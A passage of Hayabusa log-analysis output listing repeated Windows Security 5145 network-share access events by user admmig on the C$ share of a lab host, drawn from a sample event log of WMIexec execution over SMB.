Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.426 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.426 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.475 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.475 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.475 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.475 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.475 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.506 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.506 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.506 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.506 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.537 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.537 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.537 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.537 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 